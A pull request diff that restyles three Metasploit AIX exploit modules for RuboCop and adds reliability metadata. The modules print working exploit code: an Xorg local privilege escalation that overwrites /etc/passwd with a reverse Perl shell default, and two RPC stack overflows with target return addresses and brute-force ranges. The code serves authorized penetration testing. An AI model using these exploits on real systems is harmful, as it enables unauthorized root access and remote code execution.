### PR TITLE
modules/exploits/aix: Resolve RuboCop violations

### DIFF
--- a/modules/exploits/aix/local/xorg_x11_server.rb
+++ b/modules/exploits/aix/local/xorg_x11_server.rb
@@ -10,65 +10,67 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Exploit::FileDropper
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Xorg X11 Server Local Privilege Escalation',
-      'Description'    => %q(
-        WARNING: Successful execution of this module results in /etc/passwd being overwritten.
+    super(
+      update_info(
+        info,
+        'Name' => 'Xorg X11 Server Local Privilege Escalation',
+        'Description' => %q{
+          WARNING: Successful execution of this module results in /etc/passwd being overwritten.
 
-        This module is a port of the OpenBSD X11 Xorg exploit to run on AIX.
+          This module is a port of the OpenBSD X11 Xorg exploit to run on AIX.
 
-        A permission check flaw exists for -modulepath and -logfile options when
-        starting Xorg.  This allows unprivileged users that can start the server
-        the ability to elevate privileges and run arbitrary code under root
-        privileges.
+          A permission check flaw exists for -modulepath and -logfile options when
+          starting Xorg.  This allows unprivileged users that can start the server
+          the ability to elevate privileges and run arbitrary code under root
+          privileges.
 
-        This module has been tested with AIX 7.1 and 7.2, and should also work with 6.1.
-        Due to permission restrictions of the crontab in AIX, this module does not use cron,
-        and instead overwrites /etc/passwd in order to create a new user with root privileges.
-        All currently logged in users need to be included when /etc/passwd is overwritten,
-        else AIX will throw 'Cannot get "LOGNAME" variable' when attempting to change user.
-        The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX,
-        and is replaced by '-config', in conjuction with ANSI-C quotes to inject newlines when
-        overwriting /etc/passwd.
-      ),
-      'Author'         =>
-        [
+          This module has been tested with AIX 7.1 and 7.2, and should also work with 6.1.
+          Due to permission restrictions of the crontab in AIX, this module does not use cron,
+          and instead overwrites /etc/passwd in order to create a new user with root privileges.
+          All currently logged in users need to be included when /etc/passwd is overwritten,
+          else AIX will throw 'Cannot get "LOGNAME" variable' when attempting to change user.
+          The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX,
+          and is replaced by '-config', in conjuction with ANSI-C quotes to inject newlines when
+          overwriting /etc/passwd.
+        },
+        'Author' => [
           'Narendra Shinde', # Discovery and original FreeBSD exploit
           'Zack Flack <dzflack[at]gmail.com>' # Metasploit module and original AIX exploit
         ],
-      'License'        => MSF_LICENSE,
-      'DisclosureDate' => '2018-10-25',
-      'Notes'         =>
-        {
-          'SideEffects' => [ CONFIG_CHANGES ]
+        'License' => MSF_LICENSE,
+        'DisclosureDate' => '2018-10-25',
+        'Notes' => {
+          'SideEffects' => [ CONFIG_CHANGES, ARTIFACTS_ON_DISK ],
+          'Reliability' => [ UNRELIABLE_SESSION ],
+          'Stability' => [ CRASH_SERVICE_DOWN ]
         },
-      'References'     =>
-        [
+        'References' => [
           ['CVE', '2018-14665'],
           ['URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html'],
           ['URL', 'https://aix.software.ibm.com/aix/efixes/security/xorg_advisory3.asc'],
           ['URL', 'https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl'],
           ['EDB', '45938']
         ],
-      'Platform'       => ['unix'],
-      'Arch'           => [ARCH_CMD],
-      'SessionTypes'   => ['shell'],
-      'Payload'        => {
-        'Compat' => {
-          'PayloadType'  => 'cmd',
-          'RequiredCmd'  => 'perl'
-        }
-      },
-      'DefaultOptions' => {
-        'Payload' => 'cmd/unix/reverse_perl'
-      },
-      'Targets'        =>
-        [
+        'Platform' => ['unix'],
+        'Arch' => [ARCH_CMD],
+        'SessionTypes' => ['shell'],
+        'Payload' => {
+          'Compat' => {
+            'PayloadType' => 'cmd',
+            'RequiredCmd' => 'perl'
+          }
+        },
+        'DefaultOptions' => {
+          'Payload' => 'cmd/unix/reverse_perl'
+        },
+        'Targets' => [
           ['IBM AIX Version 6.1', {}],
           ['IBM AIX Version 7.1', {}],
           ['IBM AIX Version 7.2', {}]
         ],
-      'DefaultTarget'  => 1))
+        'DefaultTarget' => 1
+      )
+    )
 
     register_options(
       [

--- a/modules/exploits/aix/rpc_cmsd_opcode21.rb
+++ b/modules/exploits/aix/rpc_cmsd_opcode21.rb
@@ -10,70 +10,73 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Brute
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow',
+        'Description' => %q{
           This module exploits a buffer overflow vulnerability in opcode 21 handled by
-        rpc.cmsd on AIX. By making a request with a long string passed to the first
-        argument of the "rtable_create" RPC, a stack based buffer overflow occurs. This
-        leads to arbitrary code execution.
+          rpc.cmsd on AIX. By making a request with a long string passed to the first
+          argument of the "rtable_create" RPC, a stack based buffer overflow occurs. This
+          leads to arbitrary code execution.
 
-        NOTE: Unsuccessful attempts may cause inetd/portmapper to enter a state where
-        further attempts are not possible.
-      },
-      'Author'         =>
-        [
+          NOTE: Unsuccessful attempts may cause inetd/portmapper to enter a state where
+          further attempts are not possible.
+        },
+        'Author' => [
           'Rodrigo Rubira Branco (BSDaemon)',
           'jduck',
         ],
-      'References'     =>
-        [
+        'References' => [
           [ 'CVE', '2009-3699' ],
           [ 'OSVDB', '58726' ],
           [ 'BID', '36615' ],
           [ 'URL', 'https://web.archive.org/web/20091013155835/http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=825' ],
           [ 'URL', 'https://web.archive.org/web/20221204155746/http://aix.software.ibm.com/aix/efixes/security/cmsd_advisory.asc' ]
         ],
-      'Platform'       => [ 'aix' ],
-      'Payload'        =>
-        {
+        'Platform' => [ 'aix' ],
+        'Payload' => {
           'Space' => 4104,
           'BadChars' => "\x00",
           # The RPC function splits the string by 0x40, watch out!
           # It's not a payload badchar since we're putting the payload elsewhere...
           'DisableNops' => true
         },
-      'Targets'        =>
-        [
+        'Targets' => [
           [
             'IBM AIX Version 5.1',
             {
-              'Arch'     => 'ppc',
+              'Arch' => 'ppc',
               'Platform' => 'aix',
-              'AIX'      => '5.1',
+              'AIX' => '5.1',
               'Bruteforce' =>
               {
                 'Start' => { 'Ret' => 0x2022dfc8 },
-                #worked on ibmoz - 'Start' => { 'Ret' => 0x2022e8c8 },
-                'Stop'  => { 'Ret' => 0x202302c8 },
-                'Step'  => 600
+                # worked on ibmoz - 'Start' => { 'Ret' => 0x2022e8c8 },
+                'Stop' => { 'Ret' => 0x202302c8 },
+                'Step' => 600
               }
             }
           ],
         ],
-      'DefaultTarget' => 0,
-      'DisclosureDate' => '2009-10-07'))
-
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2009-10-07',
+        'Notes' => {
+          'Reliability' => [ UNRELIABLE_SESSION ],
+          'Stability' => [ CRASH_SERVICE_RESTARTS ],
+          'SideEffects' => [ IOC_IN_LOGS ]
+        }
+      )
+    )
   end
 
   def brute_exploit(brute_target)
-
-    if not @aixpayload
+    if !@aixpayload
       datastore['AIX'] = target['AIX']
       @aixpayload = regenerate_payload.encoded
     end
 
-    print_status("Trying to exploit rpc.cmsd with address 0x%x ..." % brute_target['Ret'])
+    print_status('Trying to exploit rpc.cmsd with address 0x%x ...' % brute_target['Ret'])
 
     begin
       sunrpc_create('udp', 100068, 4)
@@ -82,22 +85,21 @@ class MetasploitModule < Msf::Exploit::Remote
       buf = make_nops(1024 - @aixpayload.length)
       buf << @aixpayload
       xdr = Rex::Encoder::XDR.encode(buf, buf)
-      10.times {
+      10.times do
         sunrpc_call(7, xdr, 2)
-      }
+      end
 
-      #print_status("ATTACH DEBUGGER NOW!"); select(nil,nil,nil,5)
+      # print_status("ATTACH DEBUGGER NOW!"); select(nil,nil,nil,5)
 
       buf = rand_text_alphanumeric(payload_space)
       buf << [brute_target['Ret']].pack('N')
 
-      xdr = Rex::Encoder::XDR.encode(buf, "")
+      xdr = Rex::Encoder::XDR.encode(buf, '')
       sunrpc_authunix('localhost', 0, 0, [])
       sunrpc_call(21, xdr, 2)
 
       handler(sunrpc_callsock)
       sunrpc_destroy
-
     rescue Rex::Proto::SunRPC::RPCTimeout
       vprint_error('RPCTimeout')
     rescue Rex::Proto::SunRPC::RPCError => e

--- a/modules/exploits/aix/rpc_ttdbserverd_realpath.rb
+++ b/modules/exploits/aix/rpc_ttdbserverd_realpath.rb
@@ -10,253 +10,255 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Brute
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)',
+        'Description' => %q{
           This module exploits a buffer overflow vulnerability in _tt_internal_realpath
-        function of the ToolTalk database server (rpc.ttdbserverd).
-      },
-      'Author'         =>
-        [
+          function of the ToolTalk database server (rpc.ttdbserverd).
+        },
+        'Author' => [
           'Ramon de C Valle',
           'Adriano Lima <adriano[at]risesecurity.org>',
         ],
-      'Platform'       => [ 'aix' ],
-      'References'     =>
-        [
+        'Platform' => [ 'aix' ],
+        'References' => [
           [ 'CVE', '2009-2727'],
           [ 'OSVDB', '55151' ]
         ],
-      'Payload'        =>
-        {
-          'BadChars' => "\x00",
+        'Payload' => {
+          'BadChars' => "\x00"
         },
-      'Targets'        =>
-        [
+        'Targets' => [
           [
             'IBM AIX Version 6.1.4',
             {
-              'Arch'     => 'ppc',
+              'Arch' => 'ppc',
               'Platform' => 'aix',
-              'Ret'      => 0x20099430+4096,
-              'Addr1'    => 0x2ff1ff50-8192,
-              'AIX'  => '6.1.4',
+              'Ret' => 0x20099430 + 4096,
+              'Addr1' => 0x2ff1ff50 - 8192,
+              'AIX' => '6.1.4',
               'Bruteforce' =>
               {
-                'Start' => { 'Ret' => 0x20099430-8192 },
-                'Stop'  => { 'Ret' => 0x20099430+8192 },
-                'Step'  => 1024
+                'Start' => { 'Ret' => 0x20099430 - 8192 },
+                'Stop' => { 'Ret' => 0x20099430 + 8192 },
+                'Step' => 1024
               }
             }
           ],
           [
             'IBM AIX Version 6.1.3',
             {
-              'Arch'     => 'ppc',
+              'Arch' => 'ppc',
               'Platform' => 'aix',
-              'Ret'      => 0x20099280+4096,
-              'Addr1'    => 0x2ff1ffd0-8192,
-              'AIX'  => '6.1.3',
+              'Ret' => 0x20099280 + 4096,
+              'Addr1' => 0x2ff1ffd0 - 8192,
+              'AIX' => '6.1.3',
               'Bruteforce' =>
               {
-                'Start' => { 'Ret' => 0x20099280-8192 },
-                'Stop'  => { 'Ret' => 0x20099280+8192 },
-                'Step'  => 1024
+                'Start' => { 'Ret' => 0x20099280 - 8192 },
+                'Stop' => { 'Ret' => 0x20099280 + 8192 },
+                'Step' => 1024
               }
             }
           ],
           [
             'IBM AIX Version 6.1.2',
             {
-              'Arch'     => 'ppc',
+              'Arch' => 'ppc',
               'Platform' => 'aix',
-              'Ret'      => 0x20099280+4096,
-              'Addr1'    => 0x2ff1ffd0-8192,
-              'AIX'  => '6.1.2',
+              'Ret' => 0x20099280 + 4096,
+              'Addr1' => 0x2ff1ffd0 - 8192,
+              'AIX' => '6.1.2',
               'Bruteforce' =>
               {
-                'Start' => { 'Ret' => 0x20099280-8192 },
-                'Stop'  => { 'Ret' => 0x20099280+8192 },
-                'Step'  => 1024
+                'Start' => { 'Ret' => 0x20099280 - 8192 },
+                'Stop' => { 'Ret' => 0x20099280 + 8192 },
+                'Step' => 1024
               }
             }
           ],
           [
             'IBM AIX Version 6.1.1',
             {
-              'Arch'     => 'ppc',
+              'Arch' => 'ppc',
               'Platform' => 'aix',
-              'Ret'      => 0x20099280+4096,
-              'Addr1'    => 0x2ff1ffd0-8192,
-              'AIX'  => '6.1.1',
+              'Ret' => 0x20099280 + 4096,
+              'Addr1' => 0x2ff1ffd0 - 8192,
+              'AIX' => '6.1.1',
               'Bruteforce' =>
               {
-                'Start' => { 'Ret' => 0x20099280-8192 },
-                'Stop'  => { 'Ret' => 0x20099280+8192 },
-                'Step'  => 1024
+                'Start' => { 'Ret' => 0x20099280 - 8192 },
+                'Stop' => { 'Ret' => 0x20099280 + 8192 },
+                'Step' => 1024
               }
             }
           ],
           [
             'IBM AIX Version 6.1.0',
             {
-              'Arch'     => 'ppc',
+              'Arch' => 'ppc',
               'Platform' => 'aix',
-              'Ret'      => 0x20099280+4096,
-              'Addr1'    => 0x2ff1ffd0-8192,
-              'AIX'  => '6.1.0',
+              'Ret' => 0x20099280 + 4096,
+              'Addr1' => 0x2ff1ffd0 - 8192,
+              'AIX' => '6.1.0',
               'Bruteforce' =>
               {
-                'Start' => { 'Ret' => 0x20099280-8192 },
-                'Stop'  => { 'Ret' => 0x20099280+8192 },
-                'Step'  => 1024
+                'Start' => { 'Ret' => 0x20099280 - 8192 },
+                'Stop' => { 'Ret' => 0x20099280 + 8192 },
+                'Step' => 1024
               }
             }
           ],
           [
             'IBM AIX Version 5.3.10 5.3.9 5.3.8 5.3.7',
             {
-              'Arch'     => 'ppc',
+              'Arch' => 'ppc',
               'Platform' => 'aix',
-              'Ret'      => 0x20096ba0+4096,
-              'Addr1'    => 0x2ff1ff14-8192,
-              'AIX'  => '5.3.9',
+              'Ret' => 0x20096ba0 + 4096,
+              'Addr1' => 0x2ff1ff14 - 8192,
+              'AIX' => '5.3.9',
               'Bruteforce' =>
               {
-                'Start' => { 'Ret' => 0x20096ba0-8192 },
-                'Stop'  => { 'Ret' => 0x20096ba0+8192 },
-                'Step'  => 1024
+                'Start' => { 'Ret' => 0x20096ba0 - 8192 },
+                'Stop' => { 'Ret' => 0x20096ba0 + 8192 },
+                'Step' => 1024
               }
             }
           ],
           [
             'IBM AIX Version 5.3.10',
             {
-              'Arch'     => 'ppc',
+              'Arch' => 'ppc',
               'Platform' => 'aix',
-              'Ret'      => 0x20096bf0+4096,
-              'Addr1'    => 0x2ff1ff14-8192,
-              'AIX'  => '5.3.10',
+              'Ret' => 0x20096bf0 + 4096,
+              'Addr1' => 0x2ff1ff14 - 8192,
+              'AIX' => '5.3.10',
               'Bruteforce' =>
               {
-                'Start' => { 'Ret' => 0x20096bf0-8192 },
-                'Stop'  => { 'Ret' => 0x20096bf0+8192 },
-                'Step'  => 1024
+                'Start' => { 'Ret' => 0x20096bf0 - 8192 },
+                'Stop' => { 'Ret' => 0x20096bf0 + 8192 },
+                'Step' => 1024
               }
             }
           ],
           [
             'IBM AIX Version 5.3.9',
             {
-              'Arch'     => 'ppc',
+              'Arch' => 'ppc',
               'Platform' => 'aix',
-              'Ret'      => 0x20096ba0+4096,
-              'Addr1'    => 0x2ff1ff14-8192,
-              'AIX'  => '5.3.9',
+              'Ret' => 0x20096ba0 + 4096,
+              'Addr1' => 0x2ff1ff14 - 8192,
+              'AIX' => '5.3.9',
               'Bruteforce' =>
               {
-                'Start' => { 'Ret' => 0x20096ba0-8192 },
-                'Stop'  => { 'Ret' => 0x20096ba0+8192 },
-                'Step'  => 1024
+                'Start' => { 'Ret' => 0x20096ba0 - 8192 },
+                'Stop' => { 'Ret' => 0x20096ba0 + 8192 },
+                'Step' => 1024
               }
             }
           ],
           [
             'IBM AIX Version 5.3.8',
             {
-              'Arch'     => 'ppc',
+              'Arch' => 'ppc',
               'Platform' => 'aix',
-              'Ret'      => 0x20096c10+4096,
-              'Addr1'    => 0x2ff1ff98-8192,
-              'AIX'  => '5.3.8',
+              'Ret' => 0x20096c10 + 4096,
+              'Addr1' => 0x2ff1ff98 - 8192,
+              'AIX' => '5.3.8',
               'Bruteforce' =>
               {
-                'Start' => { 'Ret' => 0x20096c10-8192 },
-                'Stop'  => { 'Ret' => 0x20096c10+8192 },
-                'Step'  => 1024
+                'Start' => { 'Ret' => 0x20096c10 - 8192 },
+                'Stop' => { 'Ret' => 0x20096c10 + 8192 },
+                'Step' => 1024
               }
             }
           ],
           [
             'IBM AIX Version 5.3.7',
             {
-              'Arch'     => 'ppc',
+              'Arch' => 'ppc',
               'Platform' => 'aix',
-              'Ret'      => 0x20096c10+4096,
-              'Addr1'    => 0x2ff1ff98-8192,
-              'AIX'  => '5.3.7',
+              'Ret' => 0x20096c10 + 4096,
+              'Addr1' => 0x2ff1ff98 - 8192,
+              'AIX' => '5.3.7',
               'Bruteforce' =>
               {
-                'Start' => { 'Ret' => 0x20096c10-8192 },
-                'Stop'  => { 'Ret' => 0x20096c10+8192 },
-                'Step'  => 1024
+                'Start' => { 'Ret' => 0x20096c10 - 8192 },
+                'Stop' => { 'Ret' => 0x20096c10 + 8192 },
+                'Step' => 1024
               }
             }
           ],
           [
             'Debug IBM AIX Version 6.1',
             {
-              'Arch'     => 'ppc',
+              'Arch' => 'ppc',
               'Platform' => 'aix',
-              'Ret'      => 0xaabbccdd,
-              'Addr1'    => 0xddccbbaa,
-              'AIX'  => '6.1.4',
+              'Ret' => 0xaabbccdd,
+              'Addr1' => 0xddccbbaa,
+              'AIX' => '6.1.4',
               'Bruteforce' =>
               {
                 'Start' => { 'Ret' => 0xaabbccdd },
-                'Stop'  => { 'Ret' => 0xaabbccdd },
-                'Step'  => 1024
+                'Stop' => { 'Ret' => 0xaabbccdd },
+                'Step' => 1024
               }
             }
           ],
           [
             'Debug IBM AIX Version 5.3',
             {
-              'Arch'     => 'ppc',
+              'Arch' => 'ppc',
               'Platform' => 'aix',
-              'Ret'      => 0xaabbccdd,
-              'Addr1'    => 0xddccbbaa,
-              'AIX'  => '5.3.10',
+              'Ret' => 0xaabbccdd,
+              'Addr1' => 0xddccbbaa,
+              'AIX' => '5.3.10',
               'Bruteforce' =>
               {
                 'Start' => { 'Ret' => 0xaabbccdd },
-                'Stop'  => { 'Ret' => 0xaabbccdd },
-                'Step'  => 1024
+                'Stop' => { 'Ret' => 0xaabbccdd },
+                'Step' => 1024
               }
             }
           ],
         ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2009-06-17'))
-
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2009-06-17',
+        'Notes' => {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ CRASH_SERVICE_RESTARTS ],
+          'SideEffects' => [ IOC_IN_LOGS ]
+        }
+      )
+    )
   end
 
   def brute_exploit(brute_target)
-
-    if not @aixpayload
+    if !@aixpayload
       datastore['AIX'] = target['AIX']
       @aixpayload = regenerate_payload.encoded
     end
 
-    print_status("Trying to exploit rpc.ttdbserverd with address 0x%08x..." % brute_target['Ret'])
+    print_status('Trying to exploit rpc.ttdbserverd with address 0x%08x...' % brute_target['Ret'])
 
     begin
-
       sunrpc_create('tcp', 100083, 1)
 
       if target['AIX'] =~ /6\./
-        buf = "A"
+        buf = 'A'
       else
-        buf = "AA"
+        buf = 'AA'
       end
 
       buf << [target['Addr1']].pack('N') * (1022 + 8)
       buf << [brute_target['Ret']].pack('N') * 32
 
       if target['AIX'] =~ /6\./
-        buf << "AAA"
+        buf << 'AAA'
       else
-        buf << "AA"
+        buf << 'AA'
       end
 
       buf << "\x7f\xff\xfb\x78" * 1920
@@ -268,7 +270,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
       sunrpc_destroy
       handler
-
     rescue Rex::Proto::SunRPC::RPCTimeout
       # print_error('RPCTimeout')
     rescue EOFError


### PR DESCRIPTION
All violations were resolved with `rubocop -a`, except missing notes.
